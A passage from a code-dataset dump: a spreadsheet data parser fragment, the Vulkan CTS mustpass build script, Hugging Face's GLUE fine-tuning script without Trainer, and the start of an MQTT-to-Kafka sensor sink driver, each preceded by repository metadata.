row[propertyName] = float(cell.value.replace(',', '.'))
else:
row[propertyName] = float(cell.value)
else:
row[propertyName] = cell.value
# ------------------------------------------------------
@staticmethod
def __parseHourly(worksheet: Worksheet) -> list:
return []
# ------------------------------------------------------
@staticmethod
def __parseDaily(worksheet: Worksheet) -> list:
res = []
# Timestamp of the data.
data_timestamp = datetime.now().isoformat()
minRowNum = FIRST_DATA_LINE_NUMBER
maxRowNum = len(worksheet['B'])
for rownum in range(minRowNum, maxRowNum + 1):
row = {}
if worksheet.cell(column=2, row=rownum).value is not None:
DataFileParser.__fillRow(row, PropertyName.TIME_PERIOD.value, worksheet.cell(column=2, row=rownum), False)
DataFileParser.__fillRow(row, PropertyName.START_INDEX.value, worksheet.cell(column=3, row=rownum), True)
DataFileParser.__fillRow(row, PropertyName.END_INDEX.value, worksheet.cell(column=4, row=rownum), True)
DataFileParser.__fillRow(row, PropertyName.VOLUME.value, worksheet.cell(column=5, row=rownum), True)
DataFileParser.__fillRow(row, PropertyName.ENERGY.value, worksheet.cell(column=6, row=rownum), True)
DataFileParser.__fillRow(row, PropertyName.CONVERTER_FACTOR.value, worksheet.cell(column=7, row=rownum), True)
DataFileParser.__fillRow(row, PropertyName.TEMPERATURE.value, worksheet.cell(column=8, row=rownum), True)
DataFileParser.__fillRow(row, PropertyName.TYPE.value, worksheet.cell(column=9, row=rownum), False)
row[PropertyName.TIMESTAMP.value] = data_timestamp
res.append(row)
DataFileParser.logger.debug(f"Daily data read successfully between row #{minRowNum} and row #{maxRowNum}")
return res
# ------------------------------------------------------
@staticmethod
def __parseWeekly(worksheet: Worksheet) -> list:
res = []
# Timestamp of the data.
data_timestamp = datetime.now().isoformat()
minRowNum = FIRST_DATA_LINE_NUMBER
maxRowNum = len(worksheet['B'])
for rownum in range(minRowNum, maxRowNum + 1):
row = {}
if worksheet.cell(column=2, row=rownum).value is not None:
DataFileParser.__fillRow(row, PropertyName.TIME_PERIOD.value, worksheet.cell(column=2, row=rownum), False)
DataFileParser.__fillRow(row, PropertyName.VOLUME.value, worksheet.cell(column=3, row=rownum), True)
DataFileParser.__fillRow(row, PropertyName.ENERGY.value, worksheet.cell(column=4, row=rownum), True)
row[PropertyName.TIMESTAMP.value] = data_timestamp
res.append(row)
DataFileParser.logger.debug(f"Weekly data read successfully between row #{minRowNum} and row #{maxRowNum}")
return res
# ------------------------------------------------------
@staticmethod
def __parseMonthly(worksheet: Worksheet) -> list:
res = []
# Timestamp of the data.
data_timestamp = datetime.now().isoformat()
minRowNum = FIRST_DATA_LINE_NUMBER
maxRowNum = len(worksheet['B'])
for rownum in range(minRowNum, maxRowNum + 1):
row = {}
if worksheet.cell(column=2, row=rownum).value is not None:
DataFileParser.__fillRow(row, PropertyName.TIME_PERIOD.value, worksheet.cell(column=2, row=rownum), False)
DataFileParser.__fillRow(row, PropertyName.VOLUME.value, worksheet.cell(column=3, row=rownum), True)
DataFileParser.__fillRow(row, PropertyName.ENERGY.value, worksheet.cell(column=4, row=rownum), True)
row[PropertyName.TIMESTAMP.value] = data_timestamp
res.append(row)
DataFileParser.logger.debug(f"Monthly data read successfully between row #{minRowNum} and row #{maxRowNum}")
return res
| 41.715278
| 126
| 0.598302
|
4a022d9e4e9845f40023e032d5862089a37cdd41
| 4,775
|
py
|
Python
|
external/vulkancts/scripts/build_mustpass.py
|
paulthomson/VK-GL-CTS
|
08de4618d38fb95b48a2bd8812f2e3d96f620df3
|
[
"Apache-2.0"
] | 2
|
2019-04-04T12:53:11.000Z
|
2020-09-01T15:27:15.000Z
|
external/vulkancts/scripts/build_mustpass.py
|
paulthomson/VK-GL-CTS
|
08de4618d38fb95b48a2bd8812f2e3d96f620df3
|
[
"Apache-2.0"
] | null | null | null |
external/vulkancts/scripts/build_mustpass.py
|
paulthomson/VK-GL-CTS
|
08de4618d38fb95b48a2bd8812f2e3d96f620df3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# Vulkan CTS
# ----------
#
# Copyright (c) 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "..", "..", "scripts"))
from build.common import DEQP_DIR
from build.config import ANY_GENERATOR
from build_caselists import Module, getModuleByName, getBuildConfig, DEFAULT_BUILD_DIR, DEFAULT_TARGET
from mustpass import Project, Package, Mustpass, Configuration, include, exclude, genMustpassLists, parseBuildConfigFromCmdLineArgs
COPYRIGHT_DECLARATION = """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
MUSTPASS_PATH = os.path.join(DEQP_DIR, "external", "vulkancts", "mustpass")
PROJECT = Project(path = MUSTPASS_PATH, copyright = COPYRIGHT_DECLARATION)
VULKAN_MODULE = getModuleByName("dEQP-VK")
BUILD_CONFIG = getBuildConfig(DEFAULT_BUILD_DIR, DEFAULT_TARGET, "Debug")
# 1.0.0
VULKAN_1_0_0_PKG = Package(module = VULKAN_MODULE, configurations = [
# Master
Configuration(name = "default",
filters = [include("master.txt")]),
])
# 1.0.1
VULKAN_1_0_1_PKG = Package(module = VULKAN_MODULE, configurations = [
# Master
Configuration(name = "default",
filters = [include("master.txt")]),
])
# 1.0.2
VULKAN_1_0_2_PKG = Package(module = VULKAN_MODULE, configurations = [
# Master
Configuration(name = "default",
filters = [include("master.txt")]),
])
# 1.1.0
VULKAN_1_1_0_PKG = Package(module = VULKAN_MODULE, configurations = [
# Master
Configuration(name = "default",
filters = [include("master.txt"),
exclude("waivers.txt")]),
Configuration(name = "default-no-waivers",
filters = [include("master.txt")]),
])
# 1.1.1
VULKAN_1_1_1_PKG = Package(module = VULKAN_MODULE, configurations = [
# Master
Configuration(name = "default",
filters = [include("master.txt"),
exclude("waivers.txt")]),
Configuration(name = "default-no-waivers",
filters = [include("master.txt")]),
])
# 1.1.2
VULKAN_1_1_2_PKG = Package(module = VULKAN_MODULE, configurations = [
# Master
Configuration(name = "default",
filters = [include("master.txt"),
exclude("waivers.txt")]),
Configuration(name = "default-no-waivers",
filters = [include("master.txt")]),
])
# 1.1.3
VULKAN_1_1_3_PKG = Package(module = VULKAN_MODULE, configurations = [
# Master
Configuration(name = "default",
filters = [include("master.txt"),
exclude("test-issues.txt"),
exclude("excluded-tests.txt"),
exclude("android-tests.txt"),
exclude("waivers.txt")]),
Configuration(name = "default-no-waivers",
filters = [include("master.txt"),
exclude("test-issues.txt"),
exclude("excluded-tests.txt"),
exclude("android-tests.txt")]),
])
MUSTPASS_LISTS = [
Mustpass(project = PROJECT, version = "1.0.0", packages = [VULKAN_1_0_0_PKG]),
Mustpass(project = PROJECT, version = "1.0.1", packages = [VULKAN_1_0_1_PKG]),
Mustpass(project = PROJECT, version = "1.0.2", packages = [VULKAN_1_0_2_PKG]),
Mustpass(project = PROJECT, version = "1.1.0", packages = [VULKAN_1_1_0_PKG]),
Mustpass(project = PROJECT, version = "1.1.1", packages = [VULKAN_1_1_1_PKG]),
Mustpass(project = PROJECT, version = "1.1.2", packages = [VULKAN_1_1_2_PKG]),
Mustpass(project = PROJECT, version = "1.1.3", packages = [VULKAN_1_1_3_PKG]),
]
if __name__ == "__main__":
genMustpassLists(MUSTPASS_LISTS, ANY_GENERATOR, parseBuildConfigFromCmdLineArgs())
| 34.107143
| 131
| 0.659267
|
4a022db69cd54635b4a0ee777c028f0db9143751
| 27,890
|
py
|
Python
|
examples/pytorch/text-classification/run_glue_no_trainer.py
|
shangz-ai/transformers
|
75259b44bf2e2b98b5a4d431fb400b7190342a01
|
[
"Apache-2.0"
] | null | null | null |
examples/pytorch/text-classification/run_glue_no_trainer.py
|
shangz-ai/transformers
|
75259b44bf2e2b98b5a4d431fb400b7190342a01
|
[
"Apache-2.0"
] | null | null | null |
examples/pytorch/text-classification/run_glue_no_trainer.py
|
shangz-ai/transformers
|
75259b44bf2e2b98b5a4d431fb400b7190342a01
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning a 🤗 Transformers model for sequence classification on GLUE."""
import argparse
import json
import logging
import math
import os
import random
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, load_metric
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
import transformers
from accelerate import Accelerator
from accelerate.logging import get_logger
from accelerate.utils import set_seed
from huggingface_hub import Repository
from transformers import (
AutoConfig,
AutoModelForSequenceClassification,
AutoTokenizer,
DataCollatorWithPadding,
PretrainedConfig,
SchedulerType,
default_data_collator,
get_scheduler,
)
from transformers.utils import get_full_repo_name, send_example_telemetry
from transformers.utils.versions import require_version
logger = get_logger(__name__)
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/text-classification/requirements.txt")
task_to_keys = {
"cola": ("sentence", None),
"mnli": ("premise", "hypothesis"),
"mrpc": ("sentence1", "sentence2"),
"qnli": ("question", "sentence"),
"qqp": ("question1", "question2"),
"rte": ("sentence1", "sentence2"),
"sst2": ("sentence", None),
"stsb": ("sentence1", "sentence2"),
"wnli": ("sentence1", "sentence2"),
}
def parse_args():
parser = argparse.ArgumentParser(description="Finetune a transformers model on a text classification task")
parser.add_argument(
"--task_name",
type=str,
default=None,
help="The name of the glue task to train on.",
choices=list(task_to_keys.keys()),
)
parser.add_argument(
"--train_file", type=str, default=None, help="A csv or a json file containing the training data."
)
parser.add_argument(
"--validation_file", type=str, default=None, help="A csv or a json file containing the validation data."
)
parser.add_argument(
"--max_length",
type=int,
default=128,
help=(
"The maximum total input sequence length after tokenization. Sequences longer than this will be truncated,"
" sequences shorter will be padded if `--pad_to_max_lengh` is passed."
),
)
parser.add_argument(
"--pad_to_max_length",
action="store_true",
help="If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.",
)
parser.add_argument(
"--model_name_or_path",
type=str,
help="Path to pretrained model or model identifier from huggingface.co/models.",
required=True,
)
parser.add_argument(
"--use_slow_tokenizer",
action="store_true",
help="If passed, will use a slow tokenizer (not backed by the 🤗 Tokenizers library).",
)
parser.add_argument(
"--per_device_train_batch_size",
type=int,
default=8,
help="Batch size (per device) for the training dataloader.",
)
parser.add_argument(
"--per_device_eval_batch_size",
type=int,
default=8,
help="Batch size (per device) for the evaluation dataloader.",
)
parser.add_argument(
"--learning_rate",
type=float,
default=5e-5,
help="Initial learning rate (after the potential warmup period) to use.",
)
parser.add_argument("--weight_decay", type=float, default=0.0, help="Weight decay to use.")
parser.add_argument("--num_train_epochs", type=int, default=3, help="Total number of training epochs to perform.")
parser.add_argument(
"--max_train_steps",
type=int,
default=None,
help="Total number of training steps to perform. If provided, overrides num_train_epochs.",
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument(
"--lr_scheduler_type",
type=SchedulerType,
default="linear",
help="The scheduler type to use.",
choices=["linear", "cosine", "cosine_with_restarts", "polynomial", "constant", "constant_with_warmup"],
)
parser.add_argument(
"--num_warmup_steps", type=int, default=0, help="Number of steps for the warmup in the lr scheduler."
)
parser.add_argument("--output_dir", type=str, default=None, help="Where to store the final model.")
parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.")
parser.add_argument("--push_to_hub", action="store_true", help="Whether or not to push the model to the Hub.")
parser.add_argument(
"--hub_model_id", type=str, help="The name of the repository to keep in sync with the local `output_dir`."
)
parser.add_argument("--hub_token", type=str, help="The token to use to push to the Model Hub.")
parser.add_argument(
"--checkpointing_steps",
type=str,
default=None,
help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.",
)
parser.add_argument(
"--resume_from_checkpoint",
type=str,
default=None,
help="If the training should continue from a checkpoint folder.",
)
parser.add_argument(
"--with_tracking",
action="store_true",
help="Whether to enable experiment trackers for logging.",
)
parser.add_argument(
"--report_to",
type=str,
default="all",
help=(
'The integration to report the results and logs to. Supported platforms are `"tensorboard"`,'
' `"wandb"` and `"comet_ml"`. Use `"all"` (default) to report to all integrations.'
"Only applicable when `--with_tracking` is passed."
),
)
parser.add_argument(
"--ignore_mismatched_sizes",
action="store_true",
help="Whether or not to enable to load a pretrained model whose head dimensions are different.",
)
args = parser.parse_args()
# Sanity checks
if args.task_name is None and args.train_file is None and args.validation_file is None:
raise ValueError("Need either a task name or a training/validation file.")
else:
if args.train_file is not None:
extension = args.train_file.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
if args.validation_file is not None:
extension = args.validation_file.split(".")[-1]
assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
if args.push_to_hub:
assert args.output_dir is not None, "Need an `output_dir` to create a repo when `--push_to_hub` is passed."
return args
def main():
args = parse_args()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_glue_no_trainer", args)
# Initialize the accelerator. We will let the accelerator handle device placement for us in this example.
# If we're using tracking, we also need to initialize it here and it will by default pick up all supported trackers
# in the environment
accelerator = (
Accelerator(log_with=args.report_to, logging_dir=args.output_dir) if args.with_tracking else Accelerator()
)
# Make one log on every process with the configuration for debugging.
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
logger.info(accelerator.state, main_process_only=False)
if accelerator.is_local_main_process:
datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
else:
datasets.utils.logging.set_verbosity_error()
transformers.utils.logging.set_verbosity_error()
# If passed along, set the training seed now.
if args.seed is not None:
set_seed(args.seed)
# Handle the repository creation
if accelerator.is_main_process:
if args.push_to_hub:
if args.hub_model_id is None:
repo_name = get_full_repo_name(Path(args.output_dir).name, token=args.hub_token)
else:
repo_name = args.hub_model_id
repo = Repository(args.output_dir, clone_from=repo_name)
with open(os.path.join(args.output_dir, ".gitignore"), "w+") as gitignore:
if "step_*" not in gitignore:
gitignore.write("step_*\n")
if "epoch_*" not in gitignore:
gitignore.write("epoch_*\n")
elif args.output_dir is not None:
os.makedirs(args.output_dir, exist_ok=True)
accelerator.wait_for_everyone()
# Get the datasets: you can either provide your own CSV/JSON training and evaluation files (see below)
# or specify a GLUE benchmark task (the dataset will be downloaded automatically from the datasets Hub).
# For CSV/JSON files, this script will use as labels the column called 'label' and as pair of sentences the
# sentences in columns called 'sentence1' and 'sentence2' if such column exists or the first two columns not named
# label if at least two columns are provided.
# If the CSVs/JSONs contain only one non-label column, the script does single sentence classification on this
# single column. You can easily tweak this behavior (see below)
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if args.task_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset("glue", args.task_name)
else:
# Loading the dataset from local csv or json file.
data_files = {}
if args.train_file is not None:
data_files["train"] = args.train_file
if args.validation_file is not None:
data_files["validation"] = args.validation_file
extension = (args.train_file if args.train_file is not None else args.validation_file).split(".")[-1]
raw_datasets = load_dataset(extension, data_files=data_files)
# See more about loading any type of standard or custom dataset at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# Labels
if args.task_name is not None:
is_regression = args.task_name == "stsb"
if not is_regression:
label_list = raw_datasets["train"].features["label"].names
num_labels = len(label_list)
else:
num_labels = 1
else:
# Trying to have good defaults here, don't hesitate to tweak to your needs.
is_regression = raw_datasets["train"].features["label"].dtype in ["float32", "float64"]
if is_regression:
num_labels = 1
else:
# A useful fast method:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique
label_list = raw_datasets["train"].unique("label")
label_list.sort() # Let's sort it for determinism
num_labels = len(label_list)
# Load pretrained model and tokenizer
#
# In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(args.model_name_or_path, num_labels=num_labels, finetuning_task=args.task_name)
tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=not args.use_slow_tokenizer)
model = AutoModelForSequenceClassification.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
ignore_mismatched_sizes=args.ignore_mismatched_sizes,
)
# Preprocessing the datasets
if args.task_name is not None:
sentence1_key, sentence2_key = task_to_keys[args.task_name]
else:
# Again, we try to have some nice defaults but don't hesitate to tweak to your use case.
non_label_column_names = [name for name in raw_datasets["train"].column_names if name != "label"]
if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", "sentence2"
else:
if len(non_label_column_names) >= 2:
sentence1_key, sentence2_key = non_label_column_names[:2]
else:
sentence1_key, sentence2_key = non_label_column_names[0], None
# Some models have set the order of the labels to use, so let's make sure we do use it.
label_to_id = None
if (
model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id
and args.task_name is not None
and not is_regression
):
# Some have all caps in their config, some don't.
label_name_to_id = {k.lower(): v for k, v in model.config.label2id.items()}
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
logger.info(
f"The configuration of the model provided the following label correspondence: {label_name_to_id}. "
"Using it!"
)
label_to_id = {i: label_name_to_id[label_list[i]] for i in range(num_labels)}
else:
logger.warning(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
"\nIgnoring the model labels as a result.",
)
elif args.task_name is None and not is_regression:
label_to_id = {v: i for i, v in enumerate(label_list)}
if label_to_id is not None:
model.config.label2id = label_to_id
model.config.id2label = {id: label for label, id in config.label2id.items()}
elif args.task_name is not None and not is_regression:
model.config.label2id = {l: i for i, l in enumerate(label_list)}
model.config.id2label = {id: label for label, id in config.label2id.items()}
padding = "max_length" if args.pad_to_max_length else False
def preprocess_function(examples):
# Tokenize the texts
texts = (
(examples[sentence1_key],) if sentence2_key is None else (examples[sentence1_key], examples[sentence2_key])
)
result = tokenizer(*texts, padding=padding, max_length=args.max_length, truncation=True)
if "label" in examples:
if label_to_id is not None:
# Map labels to IDs (not necessary for GLUE tasks)
result["labels"] = [label_to_id[l] for l in examples["label"]]
else:
# In all cases, rename the column to labels because the model will expect that.
result["labels"] = examples["label"]
return result
with accelerator.main_process_first():
processed_datasets = raw_datasets.map(
preprocess_function,
batched=True,
remove_columns=raw_datasets["train"].column_names,
desc="Running tokenizer on dataset",
)
train_dataset = processed_datasets["train"]
eval_dataset = processed_datasets["validation_matched" if args.task_name == "mnli" else "validation"]
# Log a few random samples from the training set:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
# DataLoaders creation:
if args.pad_to_max_length:
# If padding was already done ot max length, we use the default data collator that will just convert everything
# to tensors.
data_collator = default_data_collator
else:
# Otherwise, `DataCollatorWithPadding` will apply dynamic padding for us (by padding to the maximum length of
# the samples passed). When using mixed precision, we add `pad_to_multiple_of=8` to pad all tensors to multiple
# of 8s, which will enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta).
data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=(8 if accelerator.use_fp16 else None))
train_dataloader = DataLoader(
train_dataset, shuffle=True, collate_fn=data_collator, batch_size=args.per_device_train_batch_size
)
eval_dataloader = DataLoader(eval_dataset, collate_fn=data_collator, batch_size=args.per_device_eval_batch_size)
# Optimizer
# Split weights in two groups, one with weight decay and the other not.
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.learning_rate)
# Scheduler and math around the number of training steps.
overrode_max_train_steps = False
num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
if args.max_train_steps is None:
args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
overrode_max_train_steps = True
lr_scheduler = get_scheduler(
name=args.lr_scheduler_type,
optimizer=optimizer,
num_warmup_steps=args.num_warmup_steps,
num_training_steps=args.max_train_steps,
)
# Prepare everything with our `accelerator`.
model, optimizer, train_dataloader, eval_dataloader, lr_scheduler = accelerator.prepare(
model, optimizer, train_dataloader, eval_dataloader, lr_scheduler
)
# We need to recalculate our total training steps as the size of the training dataloader may have changed
num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
if overrode_max_train_steps:
args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
# Afterwards we recalculate our number of training epochs
args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch)
# Figure out how many steps we should save the Accelerator states
if hasattr(args.checkpointing_steps, "isdigit"):
checkpointing_steps = args.checkpointing_steps
if args.checkpointing_steps.isdigit():
checkpointing_steps = int(args.checkpointing_steps)
else:
checkpointing_steps = None
# We need to initialize the trackers we use, and also store our configuration.
# We initialize the trackers only on main process because `accelerator.log`
# only logs on main process and we don't want empty logs/runs on other processes.
if args.with_tracking:
if accelerator.is_main_process:
experiment_config = vars(args)
# TensorBoard cannot log Enums, need the raw value
experiment_config["lr_scheduler_type"] = experiment_config["lr_scheduler_type"].value
accelerator.init_trackers("glue_no_trainer", experiment_config)
# Get the metric function
if args.task_name is not None:
metric = load_metric("glue", args.task_name)
else:
metric = load_metric("accuracy")
# Train!
total_batch_size = args.per_device_train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps
logger.info("***** Running training *****")
logger.info(f" Num examples = {len(train_dataset)}")
logger.info(f" Num Epochs = {args.num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {args.per_device_train_batch_size}")
logger.info(f" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}")
logger.info(f" Gradient Accumulation steps = {args.gradient_accumulation_steps}")
logger.info(f" Total optimization steps = {args.max_train_steps}")
# Only show the progress bar once on each machine.
progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)
completed_steps = 0
starting_epoch = 0
# Potentially load in the weights and states from a previous save
if args.resume_from_checkpoint:
if args.resume_from_checkpoint is not None or args.resume_from_checkpoint != "":
accelerator.print(f"Resumed from checkpoint: {args.resume_from_checkpoint}")
accelerator.load_state(args.resume_from_checkpoint)
path = os.path.basename(args.resume_from_checkpoint)
else:
# Get the most recent checkpoint
dirs = [f.name for f in os.scandir(os.getcwd()) if f.is_dir()]
dirs.sort(key=os.path.getctime)
path = dirs[-1] # Sorts folders by date modified, most recent checkpoint is the last
# Extract `epoch_{i}` or `step_{i}`
training_difference = os.path.splitext(path)[0]
if "epoch" in training_difference:
starting_epoch = int(training_difference.replace("epoch_", "")) + 1
resume_step = None
else:
resume_step = int(training_difference.replace("step_", ""))
starting_epoch = resume_step // len(train_dataloader)
resume_step -= starting_epoch * len(train_dataloader)
for epoch in range(starting_epoch, args.num_train_epochs):
model.train()
if args.with_tracking:
total_loss = 0
for step, batch in enumerate(train_dataloader):
# We need to skip steps until we reach the resumed step
if args.resume_from_checkpoint and epoch == starting_epoch:
if resume_step is not None and step < resume_step:
completed_steps += 1
continue
outputs = model(**batch)
loss = outputs.loss
# We keep track of the loss at each epoch
if args.with_tracking:
total_loss += loss.detach().float()
loss = loss / args.gradient_accumulation_steps
accelerator.backward(loss)
if step % args.gradient_accumulation_steps == 0 or step == len(train_dataloader) - 1:
optimizer.step()
lr_scheduler.step()
optimizer.zero_grad()
progress_bar.update(1)
completed_steps += 1
if isinstance(checkpointing_steps, int):
if completed_steps % checkpointing_steps == 0:
output_dir = f"step_{completed_steps }"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.save_state(output_dir)
if completed_steps >= args.max_train_steps:
break
model.eval()
samples_seen = 0
for step, batch in enumerate(eval_dataloader):
with torch.no_grad():
outputs = model(**batch)
predictions = outputs.logits.argmax(dim=-1) if not is_regression else outputs.logits.squeeze()
predictions, references = accelerator.gather((predictions, batch["labels"]))
# If we are in a multiprocess environment, the last batch has duplicates
if accelerator.num_processes > 1:
if step == len(eval_dataloader) - 1:
predictions = predictions[: len(eval_dataloader.dataset) - samples_seen]
references = references[: len(eval_dataloader.dataset) - samples_seen]
else:
samples_seen += references.shape[0]
metric.add_batch(
predictions=predictions,
references=references,
)
eval_metric = metric.compute()
logger.info(f"epoch {epoch}: {eval_metric}")
if args.with_tracking:
accelerator.log(
{
"accuracy" if args.task_name is not None else "glue": eval_metric,
"train_loss": total_loss.item() / len(train_dataloader),
"epoch": epoch,
"step": completed_steps,
},
step=completed_steps,
)
if args.push_to_hub and epoch < args.num_train_epochs - 1:
accelerator.wait_for_everyone()
unwrapped_model = accelerator.unwrap_model(model)
unwrapped_model.save_pretrained(
args.output_dir, is_main_process=accelerator.is_main_process, save_function=accelerator.save
)
if accelerator.is_main_process:
tokenizer.save_pretrained(args.output_dir)
repo.push_to_hub(
commit_message=f"Training in progress epoch {epoch}", blocking=False, auto_lfs_prune=True
)
if args.checkpointing_steps == "epoch":
output_dir = f"epoch_{epoch}"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.save_state(output_dir)
if args.output_dir is not None:
accelerator.wait_for_everyone()
unwrapped_model = accelerator.unwrap_model(model)
unwrapped_model.save_pretrained(
args.output_dir, is_main_process=accelerator.is_main_process, save_function=accelerator.save
)
if accelerator.is_main_process:
tokenizer.save_pretrained(args.output_dir)
if args.push_to_hub:
repo.push_to_hub(commit_message="End of training", auto_lfs_prune=True)
if args.task_name == "mnli":
# Final evaluation on mismatched validation set
eval_dataset = processed_datasets["validation_mismatched"]
eval_dataloader = DataLoader(
eval_dataset, collate_fn=data_collator, batch_size=args.per_device_eval_batch_size
)
eval_dataloader = accelerator.prepare(eval_dataloader)
model.eval()
for step, batch in enumerate(eval_dataloader):
outputs = model(**batch)
predictions = outputs.logits.argmax(dim=-1)
metric.add_batch(
predictions=accelerator.gather(predictions),
references=accelerator.gather(batch["labels"]),
)
eval_metric = metric.compute()
logger.info(f"mnli-mm: {eval_metric}")
if args.output_dir is not None:
with open(os.path.join(args.output_dir, "all_results.json"), "w") as f:
json.dump({"eval_accuracy": eval_metric["accuracy"]}, f)
if __name__ == "__main__":
main()
| 44.129747
| 119
| 0.660559
|
4a022e2347e488268eb133457af3b0e0c12d7650
| 5,795
|
py
|
Python
|
app/server/__init__.py
|
SSU-NC/toiot-sink-node-driver
|
8611dad33f89432c4f1df572dc096f226f023f57
|
[
"Apache-2.0"
] | 2
|
2020-11-18T05:16:38.000Z
|
2021-07-06T08:47:27.000Z
|
app/server/__init__.py
|
SSU-NC/toiot-sink-node-driver
|
8611dad33f89432c4f1df572dc096f226f023f57
|
[
"Apache-2.0"
] | 4
|
2020-09-11T05:38:14.000Z
|
2020-11-04T07:04:41.000Z
|
app/server/__init__.py
|
SSU-NC/toiot-sink-node-driver
|
8611dad33f89432c4f1df572dc096f226f023f57
|
[
"Apache-2.0"
] | 2
|
2021-01-07T14:42:30.000Z
|
2021-07-23T02:49:12.000Z
|
import ast
import datetime
import json
import time
import threading
import socket
import paho.mqtt.client as mqtt
from flask import Flask
from flask import request
from kafka import KafkaProducer
from message.mqtt_message import MqttMessages
from .healthcheck import HealthCheck
from .actuator import Actuator
from .http_codes import http_response_code
from .setup import args
def on_connect(client, userdata, flags, rc):
print("connected to mqtt broker")
def on_subscribe():
print('subscribed')
def on_message(client, userdata, message):
print('messaging')
# give message to kafka as kafka producer
def send_message_to_kafka(msg):
v_topic = msg.topic.split('/')
payload = msg.payload.decode().split(',')
kafka_message = topic_manager.kafka_message(v_topic, payload)
topic_manager.add_node(int(v_topic[1]))
topic_manager.add_sensor(int(v_topic[1]), int(payload[0]))
#if topic_manager.sensor_check(v_topic[1], payload):
if len(topic_manager.get_nodes()) > 0:
'''
if health_check.get_health_check_mode():
if(health_check.set_node_state(v_topic[1], True)):
print("health check: ", v_topic[1], "->True")
else:
print("This node is not healthcheck target: ",v_topic[1])
'''
print("data by mqtt: sending message to kafka : %s" % msg)
print(kafka_message)
producer.send("sensor-data", kafka_message)
producer.flush()
def handle_uplink_command(msg):
v_topic = msg.topic.split('/') #command / uplink / MacCommand / nodeid
if v_topic[2] == 'DevStatusAns':
print('Received DevStatusAns!')
json_msg = json.loads(str(msg.payload.decode()))
health_check.set_node_state(v_topic[3], True, json_msg['battery'])
# callbacks
def data_callback(client, userdata, msg):
return send_message_to_kafka(msg)
def command_callback(client, userdata, msg):
return handle_uplink_command(msg)
# connecting mqtt client to mqtt broker
def mqtt_run():
client.on_connect = on_connect
#client.on_message = on_message
client.on_disconnect = on_disconnect
